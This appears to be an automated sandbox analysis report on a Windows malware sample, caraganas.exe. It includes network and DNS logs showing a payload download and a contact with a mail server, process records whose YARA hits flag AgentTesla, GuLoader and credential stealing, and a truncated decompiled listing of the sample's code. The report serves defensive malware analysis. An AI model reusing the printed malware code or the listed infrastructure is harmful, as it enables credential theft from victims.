Feb 25, 2021 03:39:33.626846075 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.627809048 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.627861977 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.627896070 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.627918005 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.628899097 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.628942966 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.628983974 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.629019022 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.629929066 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.629986048 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.630023956 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.630059004 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.630964041 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.630997896 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.631051064 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.631077051 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.631994963 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.632028103 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.632093906 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.632113934 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.633048058 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.633080006 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.633136988 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.633157969 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.634062052 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.634099960 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.634154081 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.634179115 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.635066986 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.635103941 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.635210991 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.635998011 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.636038065 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.636102915 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.636138916 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.637027979 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.637064934 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.637139082 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.637150049 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.637933016 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.637974024 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.638015985 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.638035059 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.638926029 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.638967037 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.639103889 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.639811993 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.639851093 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.639919996 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.639961958 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.640778065 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.640816927 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.640857935 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.640886068 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.641755104 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.641802073 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.641841888 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.641869068 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.643013954 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.643054962 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.643171072 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.643594980 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.643637896 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.643713951 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.644551039 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.644593954 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.644673109 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.645488977 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.645539045 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.645736933 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.646394968 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.646433115 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.646485090 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.647279978 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.647320032 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.647372007 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.647412062 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.648185968 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.648226976 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.649058104 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.649096012 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.649513006 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.649985075 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.650010109 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.650074005 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.650865078 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.650896072 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.650959015 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.651030064 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.651751041 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.651782036 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.651848078 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.651869059 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.652872086 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.652904987 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.653012991 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.653534889 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.653565884 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.653615952 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.653672934 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.654395103 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.654439926 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.654552937 CET	49731	443	192.168.2.6	142.250.186.33
Feb 25, 2021 03:39:33.655365944 CET	443	49731	142.250.186.33	192.168.2.6
Feb 25, 2021 03:39:33.655457973 CET	49731	443	192.168.2.6	142.250.186.33

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 03:38:49.520376921 CET	54513	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:49.569129944 CET	53	54513	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:50.725361109 CET	62044	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:50.776966095 CET	53	62044	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:51.602782965 CET	63791	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:51.666085958 CET	53	63791	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:51.841176033 CET	64267	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:51.889820099 CET	53	64267	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:52.662291050 CET	49448	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:52.724816084 CET	53	49448	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:54.352112055 CET	60342	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:54.400726080 CET	53	60342	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:55.452254057 CET	61346	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:55.501506090 CET	53	61346	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:56.841079950 CET	51774	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:56.892456055 CET	53	51774	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:57.885452032 CET	56023	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:57.935703039 CET	53	56023	8.8.8.8	192.168.2.6
Feb 25, 2021 03:38:58.996341944 CET	58384	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:38:59.044984102 CET	53	58384	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:02.026618958 CET	60261	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:02.083858013 CET	53	60261	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:03.546421051 CET	56061	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:03.598012924 CET	53	56061	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:05.042284966 CET	58336	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:05.090909958 CET	53	58336	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:06.183034897 CET	53781	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:06.231765985 CET	53	53781	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:09.605909109 CET	54064	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:09.663002968 CET	53	54064	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:10.888000965 CET	52811	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:10.936796904 CET	53	52811	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:16.163872004 CET	55299	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:16.215333939 CET	53	55299	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:17.358856916 CET	63745	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:17.407619953 CET	53	63745	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:18.316808939 CET	50055	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:18.365422010 CET	53	50055	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:27.044488907 CET	61374	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:27.101442099 CET	53	61374	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:31.931888103 CET	50339	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:31.996824026 CET	53	50339	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:32.822289944 CET	63307	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:32.889815092 CET	53	63307	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:41.844738007 CET	49694	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:41.893518925 CET	53	49694	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:42.355221033 CET	54982	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:42.407068014 CET	53	54982	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:53.450579882 CET	50010	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:53.525068998 CET	53	50010	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:54.167206049 CET	63718	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:54.232435942 CET	53	63718	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:54.902559042 CET	62116	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:54.959688902 CET	53	62116	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:55.261955976 CET	63816	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:55.320657969 CET	53	63816	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:55.446880102 CET	55014	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:55.507298946 CET	53	55014	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:56.017330885 CET	62208	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:56.074331999 CET	53	62208	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:56.451128006 CET	57574	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:56.521250963 CET	53	57574	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:56.718493938 CET	51818	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:56.775620937 CET	53	51818	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:57.439476013 CET	56628	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:57.503077030 CET	53	56628	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:58.599405050 CET	60778	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:58.662471056 CET	53	60778	8.8.8.8	192.168.2.6
Feb 25, 2021 03:39:59.720320940 CET	53799	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:39:59.779710054 CET	53	53799	8.8.8.8	192.168.2.6
Feb 25, 2021 03:40:00.333647966 CET	54683	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:40:00.393521070 CET	53	54683	8.8.8.8	192.168.2.6
Feb 25, 2021 03:40:26.525959969 CET	59329	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:40:26.611301899 CET	53	59329	8.8.8.8	192.168.2.6
Feb 25, 2021 03:40:32.628760099 CET	64021	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:40:32.677517891 CET	53	64021	8.8.8.8	192.168.2.6
Feb 25, 2021 03:40:33.569704056 CET	56129	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:40:33.643892050 CET	53	56129	8.8.8.8	192.168.2.6
Feb 25, 2021 03:41:02.268177032 CET	58177	53	192.168.2.6	8.8.8.8
Feb 25, 2021 03:41:02.357585907 CET	53	58177	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 25, 2021 03:39:32.822289944 CET	192.168.2.6	8.8.8.8	0x4252	Standard query (0)	doc-08-58-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Feb 25, 2021 03:41:02.268177032 CET	192.168.2.6	8.8.8.8	0xaa84	Standard query (0)	mail.jesmar.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 25, 2021 03:39:32.889815092 CET	8.8.8.8	192.168.2.6	0x4252	No error (0)	doc-08-58-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 03:39:32.889815092 CET	8.8.8.8	192.168.2.6	0x4252	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.33	A (IP address)	IN (0x0001)
Feb 25, 2021 03:41:02.357585907 CET	8.8.8.8	192.168.2.6	0xaa84	No error (0)	mail.jesmar.net	jesmar.net		CNAME (Canonical name)	IN (0x0001)
Feb 25, 2021 03:41:02.357585907 CET	8.8.8.8	192.168.2.6	0xaa84	No error (0)	jesmar.net		31.193.225.171	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 25, 2021 03:39:32.999440908 CET	142.250.186.33	443	192.168.2.6	49731	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Jan 26 10:05:02 CET 2021 Thu Jun 15 02:00:42 CEST 2017	Tue Apr 20 11:05:01 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 25, 2021 03:39:32.999440908 CET	142.250.186.33	443	192.168.2.6	49731	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: caraganas.exe PID: 6820 Parent PID: 5856

General

Start time:	03:38:57
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\caraganas.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\caraganas.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	99D875AC3341453383C9105669E14538
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 1724 Parent PID: 6820

General

Start time:	03:39:21
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\caraganas.exe'
Imagebase:	0xc0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 2916 Parent PID: 6820

General

Start time:	03:39:22
Start date:	25/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\caraganas.exe'
Imagebase:	0x680000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.601350930.000000001D7E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4588 Parent PID: 2916

General

Start time:	03:39:22
Start date:	25/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: caraganas.exe PID: 6820 Parent PID: 5856 caraganas.exeCOMMON

Executed Functions

Function 0040C11A, Relevance: 299.5, APIs: 159, Strings: 11, Instructions: 2033
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040C11A(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				long long _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				void* _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				intOrPtr _v120;
				signed int _v128;
				intOrPtr _v136;
				signed int _v144;
				char _v152;
				signed int _v160;
				intOrPtr _v168;
				signed int _v176;
				char _v192;
				char* _v200;
				signed int _v208;
				char _v216;
				signed int _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				intOrPtr* _v300;
				signed int _v304;
				signed int _v308;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				intOrPtr* _v368;
				signed int _v372;
				signed int _v376;
				intOrPtr* _v380;
				signed int _v384;
				intOrPtr* _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				intOrPtr* _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				intOrPtr* _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				intOrPtr* _v496;
				signed int _v500;
				intOrPtr* _v504;
				signed int _v508;
				intOrPtr* _v512;
				signed int _v516;
				intOrPtr* _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				intOrPtr* _v536;
				signed int _v540;
				intOrPtr* _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				intOrPtr* _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				intOrPtr* _v576;
				signed int _v580;
				intOrPtr* _v584;
				signed int _v588;
				intOrPtr* _v592;
				signed int _v596;
				intOrPtr* _v600;
				signed int _v604;
				signed int _v608;
				intOrPtr* _v612;
				signed int _v616;
				intOrPtr* _v620;
				signed int _v624;
				intOrPtr* _v628;
				signed int _v632;
				signed int _v636;
				intOrPtr* _v1024;
				signed int _v1036;
				intOrPtr _v1040;
				intOrPtr* _v1044;
				void* _t1016;
				signed int _t1020;
				signed int _t1024;
				signed int _t1032;
				signed int _t1036;
				signed int _t1040;
				signed int _t1044;
				signed int _t1048;
				signed int* _t1052;
				signed int _t1056;
				signed int _t1077;
				signed int _t1081;
				signed int _t1085;
				signed int _t1089;
				char* _t1093;
				signed int _t1097;
				signed int _t1101;
				signed int _t1105;
				signed int* _t1109;
				signed int _t1113;
				signed int* _t1121;
				signed int _t1129;
				signed int _t1147;
				signed int _t1151;
				signed int _t1155;
				signed int _t1159;
				signed int _t1179;
				signed int _t1183;
				signed int _t1188;
				signed int _t1192;
				char* _t1196;
				signed int _t1200;
				signed int _t1204;
				signed int _t1208;
				char* _t1212;
				signed int _t1216;
				signed int* _t1226;
				signed int _t1243;
				signed int _t1247;
				signed int _t1251;
				signed int _t1255;
				signed int* _t1259;
				signed int _t1263;
				signed int _t1280;
				signed int _t1284;
				signed int _t1288;
				signed int _t1292;
				char* _t1296;
				signed int _t1300;
				signed int _t1314;
				signed int _t1323;
				signed int _t1327;
				signed int _t1331;
				signed int _t1335;
				signed int _t1339;
				signed int* _t1343;
				signed int _t1347;
				signed int _t1364;
				signed int _t1368;
				signed int _t1372;
				signed int _t1376;
				char* _t1380;
				signed int _t1384;
				signed int _t1398;
				signed int _t1408;
				signed int _t1412;
				signed int _t1416;
				signed int _t1420;
				signed int _t1440;
				signed int _t1444;
				signed int _t1452;
				intOrPtr _t1454;
				char* _t1463;
				signed int _t1469;
				void* _t1472;
				signed int _t1477;
				void* _t1478;
				intOrPtr _t1534;
				intOrPtr _t1592;
				void* _t1609;
				signed int* _t1622;
				void* _t1628;
				void* _t1629;
				void* _t1631;
				intOrPtr _t1632;
				void* _t1634;
				void* _t1635;
				void* _t1637;
				void* _t1639;
				void* _t1640;
				void* _t1642;
				void* _t1643;
				void* _t1645;
				void* _t1646;
				void* _t1648;
				intOrPtr* _t1650;

				_t1478 = __ebx;
				_t1629 = _t1631;
				_t1632 = _t1631 - 0xc;
				 *[fs:0x0] = _t1632;
				L004011F0();
				_v16 = _t1632;
				_v12 = 0x401148;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_t1016 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t1628);
				_push(0x40b3bc);
				L004012F2();
				if(_t1016 != 2) {
					_v216 = 0x80020004;
					_v224 = 0xa;
					_v200 = 0x80020004;
					_v208 = 0xa;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1477 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v268 = _t1477;
					if(_v268 >= 0) {
						_v364 = _v364 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x40b0e8);
						_push(_a4);
						_push(_v268);
						L004012EC();
						_v364 = _t1477;
					}
				}
				if( *0x410010 != 0) {
					_v368 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v368 = 0x410010;
				}
				_t1020 =  &_v88;
				L004012E6();
				_v268 = _t1020;
				_t1024 =  *((intOrPtr*)( *_v268 + 0xf8))(_v268,  &_v80, _t1020,  *((intOrPtr*)( *((intOrPtr*)( *_v368)) + 0x308))( *_v368));
				asm("fclex");
				_v272 = _t1024;
				if(_v272 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b3c0);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v372 = _t1024;
				}
				L00401322();
				_v236 = 0x43683d;
				_v320 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v320;
				_v128 = 8;
				_t54 =  &_v236; // 0x43683d
				_t1032 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v128, _t54,  &_v84);
				_v276 = _t1032;
				if(_v276 >= 0) {
					_v376 = _v376 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40b118);
					_push(_a4);
					_push(_v276);
					L004012EC();
					_v376 = _t1032;
				}
				L00401364();
				L004012DA();
				L00401352();
				if( *0x410010 != 0) {
					_v380 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v380 = 0x410010;
				}
				_t1036 =  &_v88;
				L004012E6();
				_v268 = _t1036;
				_t76 =  &_v236; // 0x43683d
				_t1040 =  *((intOrPtr*)( *_v268 + 0x60))(_v268, _t76, _t1036,  *((intOrPtr*)( *((intOrPtr*)( *_v380)) + 0x314))( *_v380));
				asm("fclex");
				_v272 = _t1040;
				if(_v272 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b438);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v384 = _t1040;
				}
				if( *0x410010 != 0) {
					_v388 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v388 = 0x410010;
				}
				_t1044 =  &_v92;
				L004012E6();
				_v276 = _t1044;
